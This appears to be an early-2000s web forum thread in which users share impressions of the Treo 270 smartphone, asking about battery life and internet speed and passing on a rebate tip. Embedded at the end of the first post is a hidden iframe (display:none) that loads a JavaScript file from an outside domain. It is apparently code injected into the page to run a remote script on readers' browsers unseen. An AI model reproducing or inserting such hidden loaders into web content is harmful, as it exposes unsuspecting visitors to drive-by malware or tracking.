i love my treo 270

i recieved my treo 270 yesterday and I love it. I had to go with voicestream but so what. There are many great qualities about this device. The screen is awesome and the keyboard is quite easy to use. I really like the backlight on the keyboard and the flip cover over the screen. I still carry my i300 FOR NOW since voicestream service is not that great in St Louis. I can't believe how small this thing is. I admit I'm a gadget junkie. I've had the 6035 and i300 and the motorola v100 and a pocket pc but the treo seems like a winner.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

How is the battery life? are you a heavy user? I can blow through both my batteries on the I300 on a ruff day. will i go nuts with the Treo? (also i am hearing that the sprint treo will be out aug 10th) but its just a rumor

how is battery life with internet use, it kills the i300 how about the treo?

how fast is the internet on the treo? closer to DSL? Closer to Nice Dial up connection

I gotta admit.... that's the first similar device that seriously tempts me to jump ship on my I300. I like it!!!! .... BUT.... hate to pay $500 (again, argh). It supports Cingular too, by the way & it sounds like the "Sprint" version will be basically the 270 in a different wrapper........ hmmmmmmmmm.

treo 270

I just started using my 270 yesterday. i was online for almost 2 hours just checking things out. i did notice a loss of about half the battery power. I use blazer to get online after having used the i300 since dec or jan I noticed with the treo the net connection is much much faster. No BS I also understand that the service will only get faster. I would recommend to anyone.

initial discount on treo 270

Hey everyone- I'm still pretty much against the whole limited battery thing with this phone, but anyone interested in buying it, go to Amazon.com and use this rebate listed to get $100 (or $150 off the 180). Activation is required, and it ends on the 22nd of this month. I don't know when Amazon will be stocked in with the 270, so you might not even get a chance to partake in the deal, but the 180 is still there, FYI.
